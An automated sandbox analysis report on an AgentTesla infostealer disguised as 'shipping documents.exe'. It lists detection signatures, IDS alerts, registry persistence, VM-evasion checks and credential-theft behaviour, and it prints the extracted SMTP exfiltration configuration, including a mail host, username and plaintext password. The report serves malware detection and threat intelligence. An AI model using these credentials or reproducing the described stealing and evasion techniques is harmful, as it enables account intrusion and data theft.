Edit tour

Windows Analysis Report
shipping documents.exe

Overview

General Information

Sample name:	shipping documents.exe
Analysis ID:	1520207
MD5:	c5516ff1d3704bad31059e7d7ca7cfe7
SHA1:	9eed578b0fc8ad2e4083b6b226cc1e3f4a04e42c
SHA256:	fd67c185be66d7cbd57f97cc05892e93e9e134ff930ae479ac17c726c74cd8d6
Tags:	AgentTeslaexeuser-threatcat_ch
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected AgentTesla

AI detected suspicious sample

Hides that the sample has been downloaded from the Internet (zone.identifier)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Outbound SMTP Connections

Uses 32bit PE files

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

shipping documents.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\shipping documents.exe" MD5: C5516FF1D3704BAD31059E7D7CA7CFE7)

RegSvcs.exe (PID: 7588 cmdline: "C:\Users\user\Desktop\shipping documents.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

boqXv.exe (PID: 7884 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

boqXv.exe (PID: 8012 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.naveentour.com", "Username": "accounts@naveentour.com", "Password": "nav!T6u2@001"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.2696258750.0000000003312000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.2696258750.00000000032C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2696258750.00000000032C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.2696258750.000000000331A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.2695267701.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2695267701.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegSvcs.exe PID: 7588	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7588	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33a94:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33b06:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33b90:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33c22:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33c8c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33cfe:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33d94:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33e24:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 7588, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boqXv

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 162.214.80.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7588, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49704

Suricata Signatures

ET MALWARE AgentTesla Exfil Via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T06:37:59.980284+0200	2030171	1	A Network Trojan was detected	192.168.2.8	49704	162.214.80.31	587	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T06:38:14.092467+0200	2855542	1	A Network Trojan was detected	192.168.2.8	49704	162.214.80.31	587	TCP

ETPRO MALWARE Agent Tesla Exfil via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T06:38:14.092467+0200	2855245	1	A Network Trojan was detected	192.168.2.8	49704	162.214.80.31	587	TCP

ETPRO MALWARE Win32/Agent Tesla SMTP Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T06:37:59.980284+0200	2839723	1	Malware Command and Control Activity Detected	192.168.2.8	49704	162.214.80.31	587	TCP

ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T06:37:59.980284+0200	2840032	1	A Network Trojan was detected	192.168.2.8	49704	162.214.80.31	587	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 2.2.RegSvcs.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.naveentour.com", "Username": "accounts@naveentour.com", "Password": "nav!T6u2@001"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: shipping documents.exe

Joe Sandbox ML: detected

Source: shipping documents.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: RegSvcs.pdb, source: boqXv.exe, 00000004.00000000.1603797825.0000000000092000.00000002.00000001.01000000.00000006.sdmp, boqXv.exe.2.dr
Source:	Binary string: RegSvcs.pdb source: boqXv.exe, 00000004.00000000.1603797825.0000000000092000.00000002.00000001.01000000.00000006.sdmp, boqXv.exe.2.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.8:49704 -> 162.214.80.31:587
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.8:49704 -> 162.214.80.31:587
Source: Network traffic	Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.8:49704 -> 162.214.80.31:587
Source: Network traffic	Suricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.8:49704 -> 162.214.80.31:587
Source: Network traffic	Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.8:49704 -> 162.214.80.31:587

Source: global traffic

TCP traffic: 192.168.2.8:49704 -> 162.214.80.31:587

Source: Joe Sandbox View

IP Address: 162.214.80.31 162.214.80.31

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: global traffic

TCP traffic: 192.168.2.8:49704 -> 162.214.80.31:587

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: mail.naveentour.com

Source: RegSvcs.exe, 00000002.00000002.2696258750.000000000331A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.naveentour.com
Source: RegSvcs.exe, 00000002.00000002.2695267701.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: shipping documents.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0193A3D8	2_2_0193A3D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_01939810	2_2_01939810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_01934AC8	2_2_01934AC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_01933EB0	2_2_01933EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_019341F8	2_2_019341F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_067E8CF0	2_2_067E8CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_067EB690	2_2_067EB690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_067F8F18	2_2_067F8F18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_067F5A58	2_2_067F5A58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_067F42D0	2_2_067F42D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_067F3288	2_2_067F3288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_067F0040	2_2_067F0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_067FE0A0	2_2_067FE0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_067FC088	2_2_067FC088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_067F5378	2_2_067F5378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_067F39D8	2_2_067F39D8

Source: shipping documents.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: shipping documents.exe

Static PE information: Section: UPX1 ZLIB complexity 0.9920951973062382

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Roaming\boqXv

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Mutant created: NULL

Source: C:\Users\user\Desktop\shipping documents.exe

File created: C:\Users\user\AppData\Local\Temp\Hezron

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\shipping documents.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\shipping documents.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\shipping documents.exe

File read: C:\Users\user\Desktop\shipping documents.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\shipping documents.exe "C:\Users\user\Desktop\shipping documents.exe"
Source: C:\Users\user\Desktop\shipping documents.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\shipping documents.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\shipping documents.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\shipping documents.exe"	Jump to behavior

Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior

Source: C:\Users\user\Desktop\shipping documents.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source:	Binary string: RegSvcs.pdb, source: boqXv.exe, 00000004.00000000.1603797825.0000000000092000.00000002.00000001.01000000.00000006.sdmp, boqXv.exe.2.dr
Source:	Binary string: RegSvcs.pdb source: boqXv.exe, 00000004.00000000.1603797825.0000000000092000.00000002.00000001.01000000.00000006.sdmp, boqXv.exe.2.dr

Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe

Code function: 6_2_00BA0839 push ebx; retn 0004h

6_2_00BA083A

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run boqXv			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run boqXv			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
